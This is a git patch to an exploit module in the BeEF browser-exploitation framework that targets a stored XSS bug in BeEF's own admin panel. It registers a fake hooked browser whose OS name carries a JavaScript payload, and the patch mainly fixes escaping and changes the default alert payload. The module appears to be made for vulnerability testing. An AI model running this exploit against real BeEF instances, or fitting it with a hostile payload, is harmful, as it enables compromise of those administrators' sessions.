From 64098917246f4592da3b93bc0719ec85a5135966 Mon Sep 17 00:00:00 2001 From: zinduolis Date: Wed, 21 Jan 2026 15:32:44 +1000 Subject: [PATCH] eliminate escaping issues --- modules/exploits/beef_admin_panel_xss/command.js | 9 +++++---- modules/exploits/beef_admin_panel_xss/config.yaml | 2 +- modules/exploits/beef_admin_panel_xss/module.rb | 2 +- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js index 10318f560..57bb478cd 100644 --- a/modules/exploits/beef_admin_panel_xss/command.js +++ b/modules/exploits/beef_admin_panel_xss/command.js @@ -6,8 +6,8 @@ beef.execute(function() { - var target_beef_url = "<%= @target_beef_url %>"; - var xss_payload = "<%= @xss_payload %>"; + var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>"; + var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>"; // Generate a random session ID (80 characters, uppercase + digits) function generateHookId() { @@ -41,7 +41,8 @@ beef.execute(function() { var HOOK = generateHookId(); // Build the malicious payload - XSS is injected into host.os.name - var malicious_os_name = 'Linux'; + // Note: the payload is wrapped in the img onerror handler + var malicious_os_name = "Linux"; var browser_data = [{ "cid": 0, @@ -62,7 +63,7 @@ beef.execute(function() { "browser.window.referrer": "http://exploited-host:8000/victim.html", "browser.window.size.width": 1678, "browser.window.size.height": 168, - "browser.date.datestamp": new Date().toString(), + "browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)", "host.os.name": malicious_os_name, "host.os.family": "Linux", "host.os.arch": 64, diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml index ecdd537e8..2b2baaad5 100644 --- a/modules/exploits/beef_admin_panel_xss/config.yaml +++ b/modules/exploits/beef_admin_panel_xss/config.yaml @@ -10,6 +10,6 @@ beef: category: "Exploits" name: "BeEF Admin Panel XSS" description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.

This can be used to test if a target BeEF instance is running a vulnerable version." - authors: ["radsec"] + authors: ["author"] target: working: ["ALL"] diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb index c5753dc76..f44675c17 100644 --- a/modules/exploits/beef_admin_panel_xss/module.rb +++ b/modules/exploits/beef_admin_panel_xss/module.rb @@ -7,7 +7,7 @@ class Beef_admin_panel_xss < BeEF::Core::Command def self.options [ { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' }, - { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert('BeEF XSS - Vulnerable!')", 'width' => '400px' } + { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert(String.fromCharCode(88,83,83))", 'width' => '400px' } ] end